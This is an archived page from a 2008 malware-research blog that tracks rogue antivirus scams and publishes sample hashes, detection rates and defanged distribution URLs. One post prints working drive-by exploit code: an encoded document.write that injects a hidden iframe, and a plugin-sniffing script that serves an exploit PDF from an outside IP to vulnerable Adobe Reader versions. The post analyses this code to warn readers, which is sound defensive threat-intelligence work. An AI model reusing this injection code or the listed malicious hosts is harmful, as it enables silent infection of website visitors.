Rogue Software | Malware Database

Archive for the 'Rogue Software' Category

Nov

Database Update - 16 Files (Low-Moderate Detection)

By djpnuemo 0 Comments

Categories: Database Update, Infection, Low Detection, Malicious Domains, Malicious Links, Malware, Malware Distribution, Rogue Anti-Malware, Rogue Security Software, Rogue Software and Rootkit

Another update for tonight. Should have more over the weekend. Find them in /pnuemo-malware/.

BE ADVISED: These URL’s may still be active. Proceed at your own risk!

services.exe
Result: 19/36 (52.78%)
MD5: c629db60a9a5d7303419b5153d3e9b0b
VirusTotal
ThreatExpert Analysis

nd82m0.dll
Result: 5/36 (13.89%)
MD5: d6f2135dc562c7d4992cf2cea2166707
VirusTotal
ThreatExpert Analysis
hxxp://85.17.166.182

kb600179.dll
Result: 5/36 (13.89%)
MD5: f946f8c3de445d45c7eb34591bee037b
VirusTotal
ThreatExpert Analysis
hxxp://89.188.16.30

setup_457_6777_.exe
Result: 1/36 (2.78%)
MD5: e9339f9045368947789ec70739de4b21
VirusTotal
ThreatExpert Analysis
hxxp://files.download-antispyware.com

scanner_457_6777_.exe
Result: 16/36 (44.44%)
MD5: e0f855c6c5fc93f0a8ed1fe9e702e492
VirusTotal
ThreatExpert Analysis
hxxp://dl.storage-antispyware.com/get/

42.exe
Result: 4/36 (11.12%)
MD5: f5201b9e77b7b31443b4e0e6190e219f
VirusTotal
ThreatExpert Analysis
hxxp://85.92.157.141/mxlivemedia/

msansspc.dll
Result: 6/36 (16.67%)
MD5: 3cc545e42b9bb14df4a63f2a37aebdb0
VirusTotal
ThreatExpert Analysis

mvnzivtlmzhxi.dll
Result: 7/36 (19.45%)
MD5: 7614e7448f1983b9641e9699f67576a4
VirusTotal
ThreatExpert Analysis

pdf.pdf
Result: 6/36 (16.67%)
MD5: a3f83503a165a19c4b01328463175cd7
VirusTotal
hxxp://activision.cc/1/spl

twext.exe
Result: 11/36 (30.56%)
MD5: 5767c816cb20753976df2edb60eaf448
VirusTotal
ThreatExpert Analysis

load.exe
Result: 12/36 (33.34%)
MD5: 9b467bdc6dd1b3e68651b7039cd373c8
VirusTotal
ThreatExpert Analysis
hxxp://activision.cc/1/

xcvb.pdf
Result: 4/36 (11.12%)
MD5: e3b86145de00ebfab3e3159d24b81104
VirusTotal
hxxp://91.203.92.137/xcv/

install.exe
Result: 16/36 (44.45%)
MD5: 0869881865032bd1b3b08d82e5e4f404
VirusTotal
ThreatExpert Analysis
hxxp://91.203.92.137/xcv/

beep.sys & figaro.sys
Result: 29/36 (80.56%)
MD5: c4618f889863b5aa357f5f5ba8f353d6
VirusTotal
ThreatExpert Analysis

brastk.exe
Result: 14/36 (38.89%)
MD5: 0d63a88fdb4259de8280f8bb7d78ec35
VirusTotal
ThreatExpert Analysis

KB908268.exe
Result: 7/36 (19.45%)
MD5: 504eb66e741186a61792862f0a83ff82
VirusTotal
ThreatExpert Analysis
hxxp://76.74.239.143/weruoiq/

msansspc.dll
Result: 6/36 (16.67%)
MD5: 3cc545e42b9bb14df4a63f2a37aebdb0
VirusTotal
ThreatExpert Analysis

Nov

Antivirus Pro 2009 - Exploiting Human Weakness for Money

By lithium 0 Comments

Categories: Antivirus Pro 2009, Database Update, Malicious Domains, Malware Removal, Rogue Security Software and Rogue Software

Note: Thie sites we talk about in this post distribute Rogue “Fake” Anti-Malware product. Do not visit, pay, or download the software discussed below.

Almost everyday our viewers ask us about Rogue anti-malware software. Out of all of the questions we receive, the most common is “When will these attacks stop?” The sad truth is that we cannot see an end to this problem in near sight. As long as the malicious individuals are able to trick or force users into downloading, installing, and eventually paying for their fake “Rogue” anti-malware products, they will continue to develop and push the envelope.

AntivirusPro 2009

The user will be prompted with the following message in the event that the browser blocks the download. When the user clicks on “Click here to get full advanced real-time protection and continue browsing”, it will automatically forward them to the payment gateway page.

“Insecure Internet Activity. Threat of Virus Attack! Due to the insecure Internet browsing your PC can easily get infected with viruses, worms and trojans without your knowledge, and that can lead to system slowdown, freezes and crashes”

Installer:

There are three possible options to the Antivirus Pro 2009 Installer. Continue, Terms of Service and Cancel.

Canceling the Installation:

When attempting to exit the installer via the cancel button, the setting defaults to “Continue with installing and running free scanner.”

Terms of Service:

Interface:

The interface may look convincing to unsuspecting victims.

Scare Messages:

Victims are presented with various scare messages to entice a purchase.

“WARNING! Antivirus Pro 2009 has found 27 useless and UNWANTED files on your computer!”

Personal data at the reach of anyone’s hand

Internet history records available

Compromising and adult material stored on your system

Chat sessions’ logs and personal Emails easily reachable

Payment Gateway:

hxxps://secure.soft-payments.com via AS20495 (WEDARE We Dare BV Autonomous System)

SharedNS:

VirusTotal:

7/36 (19.44%) –>hxxp://www.av-pro-2009.com

7/36 (19.44%) –> hxxp://xp-as-2009.com

11/36 (30.56%) –>hxxp://xpas-2009.com

16/36 (44.44%)–> hxxp://av-pro2009.com

16/36 (44.44%)–>hxxp://avpro-2009.com

16/36 (44.44%)–>hxxp://avpro2009.com/

Removal Information:Need help removing this malware?
Click here for more information on the removal process.

Don’t forget to ask for help in our user forums!

Oct

Database Update - 28 Files (Moderate Detection)

By djpnuemo 0 Comments

Categories: Database Update, Malicious Domains, Malicious Links, Malware, Rogue, Rogue Security Software, Rogue Software and XP AntiSpyware 2009

Here is an update of files from this past week. These files are available in /pnuemo-malware/ in our repository. PLEASE READ UPDATED README.TXT!

BE ADVISED: These URL’s may still be active. Proceed at your own risk.

certificado-3.15.exe
Result: 12/36 (33.34%)
MD5: b249760cd0c1a3b21df8993604efe36b
VirusTotal
ThreatExpert
hxxp://212.98.9.4/Bradesco.com.br/

Flash_Player_9.exe (Downloads or Creates: winexec32.exe & wsys33.exe)
Result: 18/36 (50%)
MD5: f6d3cc53df4a70ee53a9a0a5288834da
VirusTotal
ThreatExpert
hxxp://www.momocortes.com/blog/media/2/

wsys33.exe
Result: 10/36 (27.78%)
MD5: fa0f6781e99d1d78c0d24417cb7b88fd
VirusTotal
Sunbelt Sandbox

exe.exe (Downloads or Creates: vhosts.exe)
Result: 24/36 (66.67%)
MD5: c28f755cdf4863de48659d84c68efab7
VirusTotal
ThreatExpert
hxxp://verynicejob.info/sxe/load.php

02.exe
Result: 8/36 (22.23%)
MD5: 166da263d55d3a06b0bac738ceea769a
VirusTotal
ThreatExpert
hxxp://regect.mobi/

item.gif (Downloads or creates: msxml71.dll)
Result: 7/35 (20%)
MD5: 0a5b198090739429b0e939078517c4d8
VirusTotal
ThreatExpert
hxxp://nessotr-help.com/images/

msxml71.dll
Result: 8/36 (22.23%)
MD5: 46b14c6da49eba5ab1a07bd63b001057
VirusTotal
ThreatExpert

skash.exe (Downloads or creates: figaro.sys, beep.sys, & brastk.exe)
Result: 17/36 (47.23%)
MD5: df565df07afc10489c4b419b1f252158
VirusTotal
ThreatExpert
hxxp://destinationsurfersparadise.com.au/lsi/

beep.sys & figaro.sys
Result: 31/36 (86.12%)
MD5: 14054908c961bb3af74f08fc9dbddeac
VirusTotal

brastk.exe
Result: 17/36 (47.23%)
MD5: 18bc3ea8f0ec094e5a8bacf19e4413b0
VirusTotal
ThreatExpert

serce.php
Result: 7/36 (19.45%)
MD5: 0f3d0ea3905df454581e0c59595f72a6
VirusTotal
ThreatExpert

ex002.exe
Result: 11/36 (30.56%)
MD5: 6f6b2be08feb03f26c84100a24b4891e
VirusTotal
ThreatExpert
hxxp://traff.loadmore.eu/t/l/

setup_1_1_.exe (Installs Pro Antispyware 2009)
Result: 1/36 (2.78%)
MD5: d62c9998be552d4a7189f4c656501e81
VirusTotal
ThreatExpert
hxxp://files.proas2009dl.com/load/

pdf.pdf
Result: 7/36 (19.45%)
MD5: 746f87f5fcf309bc0c5bc422007f3740
VirusTotal
hxxp://svinushka.net/forum/spl/

video20798.cfg
Result: 11/36 (30.56%)
MD5: 1b06e026fdb1fe6e42e66472bae3cc74
VirusTotal
hxxp://lyox-lib.com/addon/

9llCJ4amiU.exe
Result: 10/36 (27.78%)
MD5: 0662482dea0f312e1ed7bfdab7cf86b1
VirusTotal
ThreatExpert
hxxp://78.157.143.225/EX/

video.cfg
Result: 8/36 (22.23%)
MD5: 75dfc5f4c4cbc9367a830d216dec62a4
VirusTotal
hxxp://69.46.24.95/addon/

DivXCodecPKG.7.exe
Result: 2/36 (5.56%)
MD5: f6b635b62fe9a91e9bc0eb01ee827f67
VirusTotal
ThreatExpert
hxxp://softawe-download-forpc.com/

7-v3av.exe (Downloads or Creates: beep.sys, figaro.sys, & brastk.exe)
Result: 12/36 (33.34%)
MD5: aed0e8cb43f48862d89daf441fd844da
VirusTotal
ThreatExpert
hxxp://91.203.92.121/7-v3av.exe

beep.sys & figaro.sys
Result: 30/36 (83.34%)
MD5: b01ed4cec7f0aa6232d49202a71e3a5c
VirusTotal

brastk.exe
Result: 11/36 (30.56%)
MD5: faa1dfd63f02675c4e717c01a476e1f8
VirusTotal
ThreatExpert

setup.exe (Downloads or Creates: getsn32.dll, smwin32.dll, & uesiuqcr.exe)
Result: 11/36 (30.56%)
MD5: d2e8f5095dcd62f912fd233c4e2e5459
VirusTotal
ThreatExpert
hxxp://kb960830-sp2-x86.enu.v6.updates.cab.windowupdate.micros0ft.com.microsofred.cn/

getsn32.dll
Result: 5/36 (13.89%)
MD5: a33aa3d2d4f3a78aa51b3bafb9ce34e1
VirusTotal
ThreatExpert

smwin32.dll
Result: 2/36 (5.56%)
MD5: 39f89f98990a946bc31cb0271b2d3e19
VirusTotal
ThreatExpert

uesiuqcr.exe
Result: 12/36 (33.34%)
MD5: d2e8f5095dcd62f912fd233c4e2e5459
VirusTotal
ThreatExpert

b156.exe
Result: 18/36 (50%)
MD5: 05411d4f5b6a3b430dcd30bea1731362
VirusTotal
ThreatExpert
hxxp://dl2.bundlext.com:8080/get.php

Removal:
Remove this threat with MalwareBytes!

Oct

Internet Exploitation Adventure

By djpnuemo 0 Comments

Categories: Database Update, IFRAME, Investigated, Rogue, Rogue Anti-Malware, Rogue Software and Vulnerabilities

This post shows the lengths people will go to in order install malware onto computers. We will show how visiting one website will take you on a journey to many websites that will check your computer for vulnerable software and if found, will install malware on your computer.

First, there is a list of the domains involved in the exploit adventure. Simply visiting hxxp://defendmycreditunion.org will start this process. Then hidden iframes are loaded with websites scanning your computer for vulnerabilities and if it can’t, redirect you somewhere else. These websites are still active so proceed at your own risk.

The links on this page DO NOT link to the infected website. They are anchored links further down the page to view the analysis easier. The links just below are listed in the approximate order in which they load would while exploiting the machine.

BE ADVISED: The actual domains may still be active. Proceed at your own risk!

Picture below shows visual map of how pages are loaded.

Continue reading ‘Internet Exploitation Adventure’

Sep

Virus Response Lab 2009

By stingner 1 Comment

Categories: Advanced Antivirus, Database Update, MalSpam, Malicious Domains, Malware, Rogue Security Software, Rogue Software and Uncategorized

Note: This site is distributing Rogue “Fake” Anti-Malware product. Do not visit, pay, or download the software discussed below.

Site:

* hxxp://viruslabs2009.com/

File: virlab_install.exe
VirusTotal: Result: 9/36 (25%)
File size: 1579973 bytes
MD5…: 93fef280425ad6fb002430abb8cf216d
SHA1..: 766a414faa1e062c0ce40f1ede93a3d166902b6c
SHA256: 4346309f29aacf14cd0fc764ccac674572a498b7f80e1a4018265008cbf1ba4c
SHA512: 371d231b30c32756be1dbd5b50e26144d506abe895a6893fdcea866b8353e310
8548ded05366e25c2d968dffa506880e8729b7b8a6b4f4e06c3814d903eba37e
PEiD..: -
TrID..: File type identification
Win64 Executable Generic (59.6%)
Win32 Executable MS Visual C++ (generic) (26.2%)
Win32 Executable Generic (5.9%)
Win32 Dynamic Link Library (generic) (5.2%)
Generic Win/DOS Executable (1.3%)

MDB: /stingner-malware/

Removal:

Remove this threat with MalwareBytes!

Sep

Antivirus 2009…brought to you by Motigo

By lithium 9 Comments

Categories: Antivirus 2009, Database Update, Malicious Domains, Malware, Malware Distribution, Motigo and Rogue Software

A colleague called me today stating that his website was the victim of a hack and he did not know what to do. He was frantic and said that his website was distributing Antivirus 2009, so I decided to take a look at it and lo and behold, we found Antivirus 2009 being distributed from Motigo’s ad system.

For those who don’t know what Antivirus 2009 is, it’s a rogue (fake) security product. You can see a video of it in action here.

*Update* We have noticed our keyword search hit for “quickupdates” has increased 70% of our total keyword hit statistics over the past 24 hours. If you are viewing our site as a result of experiencing this pop-up, please leave us a comment and be sure to include what site you were on at the time.

We traced the AV09 pop-up down to the following JavaScript counter code.

The ID has been removed to protect the victims identity

< !– Begin Motigo Webstats counter code — > < a id=”*” href=”hxxp://webstats.motigo.com/”> < img src=”hxxp://m1.webstats.motigo.com/n.gif?id=*” border=”0″ alt=”Free counter and web stats” width=”18″ height=”18″ /> < script src=”hxxp://m1.webstats.motigo.com/c.js?id=*” type=”text/javascript”> < !– End Motigo Webstats counter code — >

Resulted in this pop-up being displayed on his site:

Clicking the pop-up brought us to:

hxxp://quickupdates29.com <–don’t go here

File distributed:

File: AV2009Install_*.exe (0570484B66E9A139D8FD0A71F5448957)
MDB: /lithium-malware/AV2009Install.zip

The motigo webstat counter code is responsible for several pop-up’s and one of them is Antivirus 2009. This is a scary thought. This means that everyone hosting this code on their website can potentially infected their viewers/customers. This is an extremely cost effective distribution method for the malware creators and I bet we will see more like it as time goes by.

Important note to website owners!

If you are going to use any service (free or paid), you’d better make sure you understand all of the terms and conditions. It’s not unusual for free services to be accompanied by ad’s or pop-ups but you must ask yourself the following questions before putting anything on your site.

1. What is the service providers privacy policy?

2. What are their terms of service?

3. How do they screen their affiliate links for malware/phishing attacks?

Finally, it’s important to see what their users think of the service. As we can see, Motigo has a laundry list of pop-up complaints:

Related News: PandaLabs reports on the sudden increase of rogue (fake) security products. -> Report

Removal:

Remove this threat with MalwareBytes!

Aug

Adobe Acrobat Reader PDF Exploit (gnu.pdf & us.pdf) (UPDATED)

By djpnuemo 0 Comments

Categories: Antivirus 2008, Database Update, IFRAME, MalSpam, Malicious Links, Malware, Rogue Software and Vulnerabilities

This morning we’ve found a website that automatically loads an infected pdf file.

When the user is directed to the infected site, there is a hidden iframe that loads the pdf file. Here’s what happens…

Links still live, proceed at your own risk.

User visits hxxp://120.50.46.90/~admin/tps/index.php and the following obfuscated code is included

<script language=”javascript”>document.write(unescape(’%3C%69%66%72
%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%36%39%2E
%34%36%2E%32%37%2E%34%31%2F%61%66%78%76%2F%74%70%76%2F%69
%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68
%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69
%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74
%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66
%72%61%6D%65%3E’));</script>

when deobfuscated…

<iframe src=”http://69.46.27.41/afxv/tpv/index.php” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

We can see the hidden iframe above and the page includes the following code…

<script>
ppdf=0;
i=0;
for(;navigator.plugins[i];i++)
{
re=/.d.{2}e.A.{2}o…..l..-.+?([0-9]+.[0-9]+)/;
if(res=re.exec(navigator.plugins[i].description))
{
ppdf=res[1];
}
var re=/.h.{5}v.+?s.\s([0-9])\S([0-9]).+?([0-9]{1,5})/;
var res;
if(res=re.exec(navigator.plugins[i].description))
{
flash=res[1]+’.'+res[2]+’.'+res[3];
}
}
ppdfenable=0;
if(ppdf!=0)
{
ppdfenable=0;
ppdf=ppdf.replace(/\D/g,”");
if(ppdf[0]==7 && ppdf[1]<1)ppdfenable=1;
if(ppdf[0]<7)ppdfenable=1;if(ppdfenable)
{
document.write(’<iframe width=1 height=1 src=”hxxp://69.46.27.41/afxv/tpv/gnu.pdf”></iframe>’);
}
}
</script>

Thus leading us to the pdf in question located at hxxp://69.46.27.41/afxv/tpv/gnu.pdf. Here is additional information regarding this file. This is also available in /pnuemo-malware/.

gnu.pdf
Result: 6/35 (17.15%)
MD5: 213d20a0523b6ea6c93d4348a509c34c
VirusTotal

Update your software!

UPDATED 9/1 12p PST

us.pdf
Result: 10/36 (27.78%)
MD5: 8175212481f069a6dd54de9cbd044039
VirusTotal
hxxp://174.133.121.165/us.pdf
hxxp://88.85.95.134/us.pdf

Aug

Database Update (9 Files) Low-Moderate Detection

By djpnuemo 0 Comments

Categories: Database Update, Malicious Links, Rogue Security Software and Rogue Software

Here is a fresh round of malware found over the last couple of days. All information about them is listed. They are available /pnuemo-malware/.

Websites are still live, proceed at your own risk!

us.txt (Rename to .exe to install)
Result: 7/36 (19.45%)
MD5: 2ba4acadfb372ea3a29874afe46cf6d4
VirusTotal
ThreatExpert Analysis
hxxp://lolika.cn/docs/us.txt

us4.txt (Rename to .exe to install)
Result: 5/36 (13.89%)
MD5: 6a732d670ff5b0fc0f5d220f0e8fb332
VirusTotal
ThreatExpert Analysis
hxxp://lolika.cn/docs/us.txt

CalcRFC.exe | CalcImpSAT.exe | CalsRT58.exe
Result: 1/36 (2.78%)
MD5: daef83cdf59d4bf97d2e220c0689cd1b
VirusTotal
ThreatExpert Analysis
hxxp://art.creativity.edu.tw/images/avatar/users/
hxxp://schooldog.com/bbs/skin/sara_bbs/

videporn920ma.exe
Result: 23/36 (63.89%)
MD5: 1e5e45f5fa77546b0628a41fc37176fd
VirusTotal
ThreatExpert Analysis
hxxp://camp.ro/videporn920ma.exe

CleanerInstaller.exe
Result: 16/36 (44.45%)
MD5: d3dfcc09e20af294bce88d5b50996ead
VirusTotal
ThreatExpert Analysis
hxxp://download.secureexpertcleaner.com/CleanerInstaller.exe

TotalSecure2009.exe
Result: 4/35 (11.43%)
MD5: 02a18d7e8dc15a53b8830bdcd68e7fe4
VirusTotal
ThreatExpert Analysis
hxxp://gettotalsec2008.com/TotalSecure2009.exe

setup_110084_3_.exe
Result: 4/35 (11.43%)
MD5: 0b429e47169219edd3a21d7845355ec0
VirusTotal
ThreatExpert Analysis
hxxp://dnld.winsecuritydl.com/load/setup_110084_3_.exe

setup_1_506_.exe
Result: 14/36 (38.89%)
MD5: 852eaacfb096afe7b72fe04cebe3612d
VirusTotal
ThreatExpert Analysis
hxxp://dnld.getwsp.com/load/setup_1_506_.exe

wotcodec.v.1.000.exe
Result: 18/36 (50%)
MD5: 905c85ab50f200dd0229cc93e055ed5a
VirusTotal
ThreatExpert Analysis
hxxp://wotcodec.com/download/wotcodec.v.1.000.exe

Aug

Antivirus 2008 Pro XP

By ion 2 Comments

Categories: Antivirus 2008, Antivirus XP 2008, E-mail, LOTD, Malicious Domains, Rogue Anti-Malware, Rogue Security Software, Rogue Software and Social Engineering

We came across a new domain name registered at estdomains today. This site may appear seamlessly legitimate, as it sports a support page, affiliate page, terms of service, etc. But we can assure you that it is a bad site. Be aware of this site and do not download any of the files associated with it! Site: hxxp://antivirus2008proxp.com

What it looks like:

Removal:

Remove this threat with MalwareBytes!

Aug

The International Virus Research Lab Strikes Again!

By lithium 0 Comments

Categories: Antivirus 2008, Antivirus 2009, Database Update, Malicious Domains, Malicious Links and Rogue Software

Here are some new domains pushing out malicious binaries. All of the files have been made available in /lithium-malware/AVXP08_1.zip

Screen shots:
hxxp://supersolution-freeantivirus.com/

Site: hxxp://antivirus-bestsolution.net
Distributes: Antivirus XP 2008
Files: Setup.exe
MD5…: 0044fd9dbf39280ec10ba88068637e5e
SHA1..: d4ae99b5b490047038bf0c8a3277d3a8b42f6be9
SHA256: b7c4c4f8cf54b4fe87571b28915a38d95b05dc6b8d1a36dfaec746de8e697d78

Site: hxxp://antivirus4protection.net/
Distributes: Antivirus XP 2008
Files: Setup.exe
MD5…: b6ffa3a1c9e5ea0bd58fd2a38d42e71a
SHA1..: a60d2e00d3e35e8213ee3067eb2f3f99871b92b4
SHA256: b33b9e3dd5a662d5e11dc5d5f6df13e2b1afc4be217c3553fb0f3981591c432d

Site: hxxp://antivirusproxp.com
Distributes:Antivirus XP 2008
Files: Setup.exe
MD5…: b6ffa3a1c9e5ea0bd58fd2a38d42e71a
SHA1..: a60d2e00d3e35e8213ee3067eb2f3f99871b92b4
SHA256: b33b9e3dd5a662d5e11dc5d5f6df13e2b1afc4be217c3553fb0f3981591c432d

Site: hxxp://freebest-antivirus.net/
Distributes: IVRL Defender
Files: Setup.exe
MD5…: b6ffa3a1c9e5ea0bd58fd2a38d42e71a
SHA1..: a60d2e00d3e35e8213ee3067eb2f3f99871b92b4
SHA256: b33b9e3dd5a662d5e11dc5d5f6df13e2b1afc4be217c3553fb0f3981591c432d

Site:hxxp://goodantivirus-free.net/
Distributes: Antivirus XP 2008
Files: Setup.exe
MD5…: b6ffa3a1c9e5ea0bd58fd2a38d42e71a
SHA1..: a60d2e00d3e35e8213ee3067eb2f3f99871b92b4
SHA256: b33b9e3dd5a662d5e11dc5d5f6df13e2b1afc4be217c3553fb0f3981591c432d

Site:hxxp://noadwareantivirus.com
Distributes: Antivirus XP 2008
Files: Setup.exe
MD5…: 0044fd9dbf39280ec10ba88068637e5e
SHA1..: d4ae99b5b490047038bf0c8a3277d3a8b42f6be9
SHA256: b7c4c4f8cf54b4fe87571b28915a38d95b05dc6b8d1a36dfaec746de8e697d78

Site: hxxp://pwrantivirus2009.com/
Distributes: Power Antivirus 2009
Files: Install.exe
MD5…: a06b0ec8cecd60abcad508bcbdf467e4
SHA1..: dd2999afa470d56a460a3c216c0e34023e0deaa7
SHA256: 6519623940729b4d00c98494c309c60b5b2cad31ad5108c7876bf1e011876ea7

Site: hxxp://scanner-pwrantivirus.com (Russian Federation)
Distributes: None yet
Files: None yet

Site: hxxp://scanner-xpertantivirus.com/ (Russian Federation)
Distributes: None yet
Files: None yet

Site: hxxp://solution-freeantivirus.com/
Distributes: Antivirus XP 2008
Files: Setup.exe
MD5…: b6ffa3a1c9e5ea0bd58fd2a38d42e71a
SHA1..: a60d2e00d3e35e8213ee3067eb2f3f99871b92b4
SHA256: b33b9e3dd5a662d5e11dc5d5f6df13e2b1afc4be217c3553fb0f3981591c432d

Site: hxxp://supersolution-antivirus.com/
Distributes: IVRL Defender
Files: Install.exe
MD5…: b6ffa3a1c9e5ea0bd58fd2a38d42e71a
SHA1..: a60d2e00d3e35e8213ee3067eb2f3f99871b92b4
SHA256: b33b9e3dd5a662d5e11dc5d5f6df13e2b1afc4be217c3553fb0f3981591c432d

Site: hxxp://supersolution-freeantivirus.com/
Distributes: Antivirus XP 2008
Files: Setup.exe
MD5…: b6ffa3a1c9e5ea0bd58fd2a38d42e71a
SHA1..: a60d2e00d3e35e8213ee3067eb2f3f99871b92b4
SHA256: b33b9e3dd5a662d5e11dc5d5f6df13e2b1afc4be217c3553fb0f3981591c432d

Malware Database Forum

Search

Click for

Malware Removal Information

Special Deals

December 2008
M	T	W	T	F	S	S
« Nov
1	2	3	4	5	6	7
8	9	10	11	12	13	14
15	16	17	18	19	20	21
22	23	24	25	26	27	28
29	30	31

Support Malware Database!

Security Engineering: A Guide to Building Dependable Distributed Systems

Reversing: Secrets of Reverse Engineering

Crimeware: Understanding New Attacks and Defenses (Symantec Press)

IT Security Interviews Exposed: Secrets to Landing Your Next Information Security Job

Windows Command-Line Administrator's Pocket Consultant, 2nd Edition

Malware Database

Archive for the 'Rogue Software' Category

Database Update - 16 Files (Low-Moderate Detection)

Antivirus Pro 2009 - Exploiting Human Weakness for Money

AntivirusPro 2009

Installer:

Canceling the Installation:

Terms of Service:

Interface:

Scare Messages:

Payment Gateway:

SharedNS:

VirusTotal:

Removal Information:Need help removing this malware?
Click here for more information on the removal process.

Don’t forget to ask for help in our user forums!

Database Update - 28 Files (Moderate Detection)

Removal:
Remove this threat with MalwareBytes!

Internet Exploitation Adventure

Virus Response Lab 2009

Removal:

Remove this threat with MalwareBytes!

Antivirus 2009…brought to you by Motigo

Removal:

Remove this threat with MalwareBytes!

Adobe Acrobat Reader PDF Exploit (gnu.pdf & us.pdf) (UPDATED)

Database Update (9 Files) Low-Moderate Detection

The International Virus Research Lab Strikes Again!

Malware Database Forum

Search

Click for

Malware Removal Information

Special Deals

Recent Posts

Support Malware Database!

Blogroll

Categories

Archives

Archive for the 'Rogue Software' Category

AntivirusPro 2009

Installer:

Canceling the Installation:

Terms of Service:

Interface:

Scare Messages:

Payment Gateway:

SharedNS:

VirusTotal:

Removal Information:Need help removing this malware? Click here for more information on the removal process. Don’t forget to ask for help in our user forums!

Removal: Remove this threat with MalwareBytes!

Removal:

Removal:

Removal:

Search

Special Deals

Recent Posts

Support Malware Database!

Tag Cloud

Blogroll

Categories

Archives

Removal Information:Need help removing this malware?
Click here for more information on the removal process.

Don’t forget to ask for help in our user forums!

Removal:
Remove this threat with MalwareBytes!